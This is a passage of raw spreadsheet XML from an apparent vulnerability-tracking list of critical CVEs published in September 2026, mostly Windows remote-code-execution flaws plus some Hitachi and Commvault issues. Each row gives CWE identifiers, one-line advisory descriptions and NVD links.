t="inlineStr" /><c r="N36" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q36" s="5" t="inlineStr" /><c r="R36" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S36" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-69595</t></is></c><c r="D37" s="5" t="n"><v>9.800000000000001</v></c><c r="E37" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.011</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr" /><c r="M37" s="5" t="inlineStr" /><c r="N37" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P37" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q37" s="5" t="inlineStr" /><c r="R37" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S37" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-69715</t></is></c><c r="D38" s="5" t="n"><v>9.800000000000001</v></c><c r="E38" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.01</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr" /><c r="M38" s="5" t="inlineStr" /><c r="N38" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P38" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q38" s="5" t="inlineStr" /><c r="R38" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S38" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-69730</t></is></c><c r="D39" s="5" t="n"><v>9.800000000000001</v></c><c r="E39" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.011</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr" /><c r="M39" s="5" t="inlineStr" /><c r="N39" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q39" s="5" t="inlineStr" /><c r="R39" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S39" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-69768</t></is></c><c r="D40" s="5" t="n"><v>9.800000000000001</v></c><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.008999999999999999</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr" /><c r="M40" s="5" t="inlineStr" /><c r="N40" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P40" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q40" s="5" t="inlineStr" /><c r="R40" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S40" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-69769</t></is></c><c r="D41" s="5" t="n"><v>9.800000000000001</v></c><c r="E41" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.008999999999999999</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr" /><c r="M41" s="5" t="inlineStr" /><c r="N41" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q41" s="5" t="inlineStr" /><c r="R41" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S41" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2026-69819</t></is></c><c r="D42" s="5" t="n"><v>9.800000000000001</v></c><c r="E42" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.008999999999999999</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr" /><c r="M42" s="5" t="inlineStr" /><c r="N42" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P42" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q42" s="5" t="inlineStr" /><c r="R42" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S42" s="5" t="inlineStr"><is><t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-69824</t></is></c><c r="D43" s="5" t="n"><v>9.800000000000001</v></c><c r="E43" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.01</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr" /><c r="M43" s="5" t="inlineStr" /><c r="N43" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P43" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q43" s="5" t="inlineStr" /><c r="R43" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S43" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-69829</t></is></c><c r="D44" s="5" t="n"><v>9.800000000000001</v></c><c r="E44" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.011</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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4" s="5" t="inlineStr" /><c r="M44" s="5" t="inlineStr" /><c r="N44" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P44" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q44" s="5" t="inlineStr" /><c r="R44" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S44" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-69845</t></is></c><c r="D45" s="5" t="n"><v>9.800000000000001</v></c><c r="E45" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.008999999999999999</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K45" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L45" s="5" t="inlineStr" /><c r="M45" s="5" t="inlineStr" /><c r="N45" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q45" s="5" t="inlineStr" /><c r="R45" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S45" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-69910</t></is></c><c r="D46" s="5" t="n"><v>9.800000000000001</v></c><c r="E46" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.01</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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6" s="5" t="inlineStr" /><c r="M46" s="5" t="inlineStr" /><c r="N46" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q46" s="5" t="inlineStr" /><c r="R46" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S46" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-70296</t></is></c><c r="D47" s="5" t="n"><v>9.800000000000001</v></c><c r="E47" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.01</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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 s="5" t="inlineStr" /><c r="M47" s="5" t="inlineStr" /><c r="N47" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P47" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q47" s="5" t="inlineStr" /><c r="R47" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S47" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-71374</t></is></c><c r="D48" s="5" t="n"><v>9.800000000000001</v></c><c r="E48" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.003</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr" /><c r="K48" s="5" t="inlineStr" /><c r="L48" s="5" t="inlineStr" /><c r="M48" s="5" t="inlineStr" /><c r="N48" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q48" s="5" t="inlineStr" /><c r="R48" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S48" s="5" t="inlineStr"><is><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48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-71376</t></is></c><c r="D49" s="5" t="n"><v>9.800000000000001</v></c><c r="E49" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.01</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr" /><c r="K49" s="5" t="inlineStr" /><c r="L49" s="5" t="inlineStr" /><c r="M49" s="5" t="inlineStr" /><c r="N49" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q49" s="5" t="inlineStr" /><c r="R49" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S49" s="5" t="inlineStr"><is><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49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-71377</t></is></c><c r="D50" s="5" t="n"><v>9.800000000000001</v></c><c r="E50" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr" /><c r="M50" s="5" t="inlineStr" /><c r="N50" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q50" s="5" t="inlineStr" /><c r="R50" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S50" s="5" t="inlineStr"><is><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is></c><c r="T50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-72979</t></is></c><c r="D51" s="5" t="n"><v>9.800000000000001</v></c><c r="E51" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.01</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr" /><c r="M51" s="5" t="inlineStr" /><c r="N51" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P51" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q51" s="5" t="inlineStr" /><c r="R51" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S51" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-72982</t></is></c><c r="D52" s="5" t="n"><v>9.800000000000001</v></c><c r="E52" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.008999999999999999</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr" /><c r="M52" s="5" t="inlineStr" /><c r="N52" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P52" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q52" s="5" t="inlineStr" /><c r="R52" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S52" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-72983</t></is></c><c r="D53" s="5" t="n"><v>9.800000000000001</v></c><c r="E53" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.008999999999999999</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr" /><c r="K53" s="5" t="inlineStr" /><c r="L53" s="5" t="inlineStr" /><c r="M53" s="5" t="inlineStr" /><c r="N53" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P53" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q53" s="5" t="inlineStr" /><c r="R53" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S53" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-73009</t></is></c><c r="D54" s="5" t="n"><v>9.800000000000001</v></c><c r="E54" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.008999999999999999</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr" /><c r="M54" s="5" t="inlineStr" /><c r="N54" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P54" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q54" s="5" t="inlineStr" /><c r="R54" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S54" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-73010</t></is></c><c r="D55" s="5" t="n"><v>9.800000000000001</v></c><c r="E55" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.008999999999999999</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr" /><c r="M55" s="5" t="inlineStr" /><c r="N55" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P55" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q55" s="5" t="inlineStr" /><c r="R55" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S55" s="5" t="inlineStr"><is><t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-73025</t></is></c><c r="D56" s="5" t="n"><v>9.800000000000001</v></c><c r="E56" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.008999999999999999</v></c><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr" /><c r="K56" s="5" t="inlineStr" /><c r="L56" s="5" t="inlineStr" /><c r="M56" s="5" t="inlineStr" /><c r="N56" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q56" s="5" t="inlineStr" /><c r="R56" s="5" t="inlineStr"><is><t>CWE-1390</t></is></c><c r="S56" s="5" t="inlineStr"><is><t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-77089</t></is></c><c r="D57" s="5" t="n"><v>9.800000000000001</v></c><c r="E57" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.003</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr" /><c r="K57" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L57" s="5" t="inlineStr" /><c r="M57" s="5" t="inlineStr" /><c r="N57" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P57" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q57" s="5" t="inlineStr" /><c r="R57" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S57" s="5" t="inlineStr"><is><t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t></is></c><c r="T57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-77092</t></is></c><c r="D58" s="5" t="n"><v>9.800000000000001</v></c><c r="E58" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.002</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr" /><c r="K58" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L58" s="5" t="inlineStr" /><c r="M58" s="5" t="inlineStr" /><c r="N58" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P58" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q58" s="5" t="inlineStr" /><c r="R58" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S58" s="5" t="inlineStr"><is><t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t></is></c><c r="T58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-77098</t></is></c><c r="D59" s="5" t="n"><v>9.800000000000001</v></c><c r="E59" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" 